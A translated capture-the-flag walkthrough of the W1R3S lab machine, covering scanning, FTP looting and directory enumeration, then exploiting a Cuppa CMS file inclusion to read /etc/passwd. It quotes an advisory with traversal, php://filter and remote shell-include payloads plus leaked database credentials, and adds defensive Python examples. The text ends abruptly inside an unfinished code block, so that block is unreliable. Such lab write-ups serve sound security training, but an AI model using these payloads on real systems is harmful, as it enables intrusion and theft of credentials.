Red Team Notes: w1r3s

0x01 Host discovery

Attacker machine: 192.168.63.128

Find the target's IP by discovering the hosts on the same subnet.

Scan with nmap:

nmap -sn 192.168.63.0/24     (the target range is given as a /24, i.e. a class C network)


Target IP: 192.168.63.132

0x02 nmap scan

2.1 Port scan

The port scan has to be both complete and accurate, so scan speed must be weighed against reliability.

nmap --min-rate 10000 -p- 192.168.63.132

--min-rate: the minimum packet rate for the scan; choose it as a trade-off between speed, accuracy and network load

-p- scans all ports

It is advisable to run the scan twice and confirm that both runs give the same result.

Result:

root@Jripper:~# nmap --min-rate 10000 -p- 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:42 CST
Nmap scan report for 192.168.63.132
Host is up (0.00050s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
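The advice above is to run the port scan twice and check that the results agree. As an added example that is not part of the original post, the Python below parses nmap's normal output and diffs two runs; the two outputs are constructed, modelled on the scan shown here, and the second one deliberately lacks port 3306 to show the kind of drop a very fast --min-rate scan can produce.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample outputs of two nmap runs, modelled on the page's
# "nmap --min-rate 10000 -p-" scan. The second run deliberately lacks
# port 3306, the kind of drop a very fast scan can produce.
RUN_A = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:42 CST
Nmap scan report for 192.168.63.132
Host is up (0.00050s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)
"""

RUN_B = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:44 CST
Nmap scan report for 192.168.63.132
Host is up (0.00052s latency).
Not shown: 55529 filtered ports, 10003 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
MAC Address: 00:0C:29:AA:7F:FC (VMware)
"""

# One port line of nmap's normal output, e.g. "3306/tcp open  mysql"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

PortKey = Tuple[int, str]  # (port number, protocol)


def parse_ports(output: str) -> Dict[PortKey, Tuple[str, str]]:
    """Map (port, proto) -> (state, service) for every port line in the output."""
    ports: Dict[PortKey, Tuple[str, str]] = {}
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4))
    return ports


def diff_scans(first: str, second: str) -> Dict[str, List[PortKey]]:
    """Compare two runs: ports seen in only one of them, or whose state changed."""
    pa, pb = parse_ports(first), parse_ports(second)
    return {
        "only_in_first": sorted(set(pa) - set(pb)),
        "only_in_second": sorted(set(pb) - set(pa)),
        "state_changed": sorted(k for k in pa.keys() & pb.keys() if pa[k][0] != pb[k][0]),
    }


def scans_agree(first: str, second: str) -> bool:
    """True when both runs report exactly the same ports and states."""
    return not any(diff_scans(first, second).values())


if __name__ == "__main__":
    for category, ports in diff_scans(RUN_A, RUN_B).items():
        print(f"{category}: {ports}")
    print("agree:", scans_agree(RUN_A, RUN_B))
```

Saving each run with -oN and feeding both files to diff_scans gives the same answer without eyeballing the output; a port that shows up in only_in_first is a reason to rescan that port at a lower rate rather than to trust either run.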

Next we look at the discovered ports in detail.

2.2 Service scan

a. TCP scan

nmap -sT -sV -O -p21,22,80,3306 192.168.63.132

-sT full TCP connect scan, more reliable

-sV detect service versions

-O detect the operating system

-p the ports to scan

Result:

root@Jripper:~# nmap -sT -sV -O -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:48 CST
Nmap scan report for 192.168.63.132
Host is up (0.00055s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds

b. UDP scan

TCP is reliable, but some services are also exposed over UDP where they are less secure, so a UDP scan checks whether any service has opened UDP ports it should not have; scanning a handful of UDP ports is also quick.

nmap -sU -p21,22,80,3306 192.168.63.132

Result:

root@Jripper:~# nmap -sU -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:52 CST
Nmap scan report for 192.168.63.132
Host is up (0.00035s latency).

PORT     STATE         SERVICE
21/udp   open|filtered ftp
22/udp   open|filtered ssh
80/udp   open|filtered http
3306/udp closed        mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.28 seconds

open|filtered means nmap could not tell whether the port is open or filtered, so this scan tells us little.

2.3 Vulnerability script scan

Run nmap's built-in vuln scripts to check for known vulnerabilities:

nmap --script=vuln -p21,22,80,3306 192.168.63.132

This scan takes a while; other analysis can continue in the meantime.

Result:

root@Jripper:~# nmap --script=vuln -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:56 CST
Nmap scan report for 192.168.63.132
Host is up (0.00032s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown: 
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 169.48 seconds

2.4 Analysis

21 is FTP.

22 is SSH; brute forcing is not advisable, the source address may get blocked, and SSH itself is unlikely to be exploitable.

80 is HTTP; most likely to contain vulnerabilities and to leak information.

3306 is MySQL; relevant for privilege escalation and the like.

The nmap vuln scan mainly flagged port 80, specifically the WordPress part; this is the main attack surface and will be examined closely later.

The VMware MAC address shows that this is a virtual environment; in a real engagement a Docker escape would also be needed, and the VMware host is usually Windows.

So we rank the ports by risk: 80 > 21 = 3306 > 22

Port 21 is the simplest, so we test FTP first.

0x03 FTP

3.1 Test anonymous login

ftp 192.168.63.132

name: anonymous

password: (empty)

If anonymous login works, check what permissions it grants.


Then list the directory contents and their permissions, and fetch the three files:

ls
mget *.*   # download several files at once
get 1.txt

# for binary files switch to binary mode first; otherwise the transfer is ASCII and the file is corrupted
binary

After checking, there is no write permission, so uploading is unlikely to be possible.

3.2 Examine the files

  • 01.txt

New FTP Server For W1R3S.inc

This is leetspeak.

  • 02.txt

01ec2d8fc11c493b25029fb1f47f39ce

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

These are encoded values; the type can be identified with:

hash-identifier '01ec2d8fc11c493b25029fb1f47f39ce'

Result:

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Trying to reverse it as MD5 gives:

This is not a password

The second line is base64; decode it with:

echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d

-d means decode

Result:

root@Jripper:~# echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..root@Jripper:~# 
  • 03.txt

(ASCII-art banner; not legible after extraction)
  • worktodo.txt

ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

First line:

mirrored vertically (glyphs upside down, reading order kept)

I don't think this is the way to root

Second line:

rotated 180 degrees (glyphs upside down and order reversed)

We have a lot of work to do, please stop playing around
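The three decodes above (hash identification for 02.txt, the base64 line, and the upside-down text of worktodo.txt) as one added Python example that is not code from the original post: UNFLIP covers the glyphs used in worktodo.txt plus the remaining letters of the usual upside-down alphabet, and the first line is treated as flipped in place while the second is rotated, exactly as the post distinguishes them.

```python
import base64
import hashlib
import re

# Reverse map for "upside-down" text generators: each flipped glyph back to the
# upright letter. Covers the glyphs in the page's worktodo.txt lines plus the
# usual remaining letters; glyphs that look the same both ways (o, s, x, z, ...)
# are not listed and simply pass through.
UNFLIP = {
    "ɐ": "a", "q": "b", "ɔ": "c", "p": "d", "ǝ": "e", "ɟ": "f", "ƃ": "g",
    "ɥ": "h", "ı": "i", "ɾ": "j", "ʞ": "k", "ן": "l", "ɯ": "m", "u": "n",
    "d": "p", "b": "q", "ɹ": "r", "ʇ": "t", "n": "u", "ʌ": "v", "ʍ": "w",
    "ʎ": "y", "¡": "!", "¿": "?", ",": "'", "‘": ",", "˙": ".",
}


def unflip(text: str, rotated: bool = True) -> str:
    """Undo upside-down text.

    rotated=True  : the text was rotated 180 degrees (glyphs flipped AND order
                    reversed), as in the second worktodo.txt line.
    rotated=False : only the glyphs were flipped, reading order kept, as in the
                    first line.
    """
    chars = reversed(text) if rotated else text
    return "".join(UNFLIP.get(c, c) for c in chars)


def decode_base64_note(blob: str) -> str:
    """Decode a base64 note such as the second line of 02.txt (strict alphabet/padding)."""
    return base64.b64decode(blob, validate=True).decode("utf-8")


def guess_hash_type(digest: str) -> str:
    """Coarse hash-type guess by hex length, the same first cut hash-identifier makes.
    A 32-hex string is ambiguous (MD5, NTLM, MD4, ...), so the guess must still be verified."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return "not a hex digest"
    return {32: "MD5-sized (MD5/NTLM/MD4)", 40: "SHA-1-sized",
            64: "SHA-256-sized", 128: "SHA-512-sized"}.get(len(digest), "unknown length")


def md5_matches(digest: str, candidate: str) -> bool:
    """Confirm a candidate plaintext against a 32-hex digest by recomputing MD5."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest() == digest.lower()


if __name__ == "__main__":
    print(unflip("ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡", rotated=False))
    print(unflip("....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ"))
    print(decode_base64_note("SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=="))
    print(guess_hash_type("01ec2d8fc11c493b25029fb1f47f39ce"))
```

md5_matches is the verification step that a lookup-table result like "This is not a password" needs before it is trusted: recompute the digest from the candidate and compare, rather than relying on whatever the lookup site claimed.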

  • employee-names.txt

The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

These may be useful later, when building wordlists or guessing paths. The roles (IT Dept, Web Design) show what each person does and could be used for social engineering.

0x04 Web directory brute force

Opening the site shows the default Apache page; some personal sites leave directories there, but it is rarely exploitable.

The vuln scan found a WordPress install, so we assume a wordpress directory exists somewhere and brute force directories to enumerate what is there.

4.1 gobuster

4.2 dirb

dirb http://192.168.63.132 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/usr/share/wordlists/ is where Kali stores its wordlists

Result:

root@Jripper:/usr/share/wordlists/dirbuster# dirb http://192.168.63.132 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jan 17 19:03:18 2023
URL_BASE: http://192.168.63.132/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

^C* Generating Wordlist...
root@Jripper:/usr/share/wordlists/dirbuster# dirb http://192.168.63.132 /usr/share/wordlists/dirb/small.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jan 17 19:05:01 2023
URL_BASE: http://192.168.63.132/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt

-----------------

GENERATED WORDS: 959

---- Scanning URL: http://192.168.63.132/ ----
==> DIRECTORY: http://192.168.63.132/administrator/
==> DIRECTORY: http://192.168.63.132/javascript/
==> DIRECTORY: http://192.168.63.132/wordpress/

---- Entering directory: http://192.168.63.132/administrator/ ----
==> DIRECTORY: http://192.168.63.132/administrator/api/
==> DIRECTORY: http://192.168.63.132/administrator/classes/
==> DIRECTORY: http://192.168.63.132/administrator/installation/
==> DIRECTORY: http://192.168.63.132/administrator/js/
==> DIRECTORY: http://192.168.63.132/administrator/templates/

---- Entering directory: http://192.168.63.132/javascript/ ----

---- Entering directory: http://192.168.63.132/wordpress/ ----

---- Entering directory: http://192.168.63.132/administrator/api/ ----
==> DIRECTORY: http://192.168.63.132/administrator/api/administrator/
==> DIRECTORY: http://192.168.63.132/administrator/api/test/

---- Entering directory: http://192.168.63.132/administrator/classes/ ----

---- Entering directory: http://192.168.63.132/administrator/installation/ ----
==> DIRECTORY: http://192.168.63.132/administrator/installation/html/

---- Entering directory: http://192.168.63.132/administrator/js/ ----

---- Entering directory: http://192.168.63.132/administrator/templates/ ----
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/

---- Entering directory: http://192.168.63.132/administrator/api/administrator/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/api/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/installation/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/templates/default/ ----
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/classes/
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/css/
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/html/
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/images/

---- Entering directory: http://192.168.63.132/administrator/templates/default/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/templates/default/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/templates/default/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.63.132/administrator/templates/default/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Jan 17 19:05:07 2023
DOWNLOADED: 9590 - FOUND: 0

4.3 feroxbuster

feroxbuster

4.4 Analysis of results

0x05 Local file inclusion

5.1 searchsploit

At http://192.168.63.132/administrator/installation/ an installation form is shown.

The page misspells "database"; in the later source analysis this distinctive typo may help to find the exact source code online.

The default password shown below it is admin.

So we run the install here with password root.

An error occurs (wrong username); look for another approach. In a real test this could be retried, and injection could be attempted.

But the error reveals that the system is Cuppa CMS.

searchsploit cuppa cms

The result lists the Cuppa CMS file-inclusion exploit (ID 25971); download the exploit file:

searchsploit cuppa cms -m 25971
root@Jripper:~/baji/w1r3s# cat 25971.txt 
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
(base64-encoded output omitted)
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
        class Configuration{
                public $host = "localhost";
                public $db = "cuppa";
                public $user = "root";
                public $password = "Db@dmin";
                public $table_prefix = "cu_";
                public $administrator_template = "default";
                public $list_limit = 25;
                public $token = "OBqIPqlFWf3X";
                public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
                public $upload_default_path = "media/uploadsFiles";
                public $maximum_file_size = "5242880";
                public $secure_login = 0;
                public $secure_login_value = "";
                public $secure_login_redirect = "";
        }
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

5.2 File inclusion vulnerability

The exploit file above describes a file inclusion vulnerability, but it dates from 2013, so we cannot know whether the current system is still affected; it has to be tested.

Test with:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

That path does not exist, so we try another:

http://192.168.63.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Something was read, but it is not displayed completely. Possible reasons:

  • this method does not work
  • some encoding detail

We keep trying.

We try again with curl.

The advisory contains:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

which suggests the encoding needs adjusting.

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.63.132/administrator/alerts/alertConfigField.php

The result is the following HTML:

<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>

Pipe through html2text to get plain text:

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.63.132/administrator/alerts/alertConfigField.php | html2text
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4414  100  4347  100    67   530k   8375 --:--:-- --:--:-- --:--:--  538k
Configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/
usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/
var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/
nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/
var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:
/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/
nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time
Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:
systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:
105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/
syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:
110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:
108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/
nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/
avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-
daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/
bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:
124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:
RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:
w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/
nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL
Server,,,:/nonexistent:/bin/false
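The inclusion above works because alertConfigField.php passes $_REQUEST["urlConfig"] straight to include(). As an added example (not the post's code and not Cuppa's), the Python below shows the two things a defender needs here: resolve_include() performs the checks a safe replacement for that include must make (ALLOWED_CONFIGS is a hypothetical allow-list of template names chosen for this example), and find_lfi_attempts() flags traversal, stream-wrapper and /etc/passwd|shadow indicators in Apache access-log lines. The log lines are constructed to mirror the requests made on this page.

```python
import os
import re
from urllib.parse import unquote

# ---- Mitigation: what a safe replacement for include($_REQUEST["urlConfig"]) must do ----

# Hypothetical allow-list of template names the alert page is permitted to include.
ALLOWED_CONFIGS = {"default.php", "field_text.php"}


def resolve_include(base_dir: str, requested: str):
    """Return the absolute file to include, or None when the request is unsafe.

    Three independent checks:
    1. no URL or stream wrapper (blocks remote inclusion and php://filter),
    2. a bare file name that is on the allow-list (blocks ../ traversal),
    3. the resolved real path still lies under base_dir (defence in depth).
    """
    if "://" in requested or requested.lower().startswith("php:"):
        return None
    name = os.path.basename(requested)
    if name != requested or name not in ALLOWED_CONFIGS:
        return None
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, path]) != base:
        return None
    return path


# ---- Detection: flag inclusion attempts in Apache combined-format access log lines ----

INDICATORS = [
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("stream_wrapper", re.compile(r"\b(php|file|data|expect|zip|phar)://", re.I)),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow)\b")),
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed log lines modelled on the requests made on this page.
SAMPLE_LOG = [
    '192.168.63.128 - - [17/Jan/2023:19:20:01 +0800] "GET /administrator/alerts/alertConfigField.php'
    '?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 4347 "-" "Mozilla/5.0"',
    '192.168.63.128 - - [17/Jan/2023:19:21:10 +0800] "POST /administrator/alerts/alertConfigField.php'
    ' HTTP/1.1" 200 4414 "-" "curl/7.87.0"',
    '192.168.63.128 - - [17/Jan/2023:19:22:30 +0800] "GET /administrator/alerts/alertConfigField.php'
    '?urlConfig=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D..%2FConfiguration.php'
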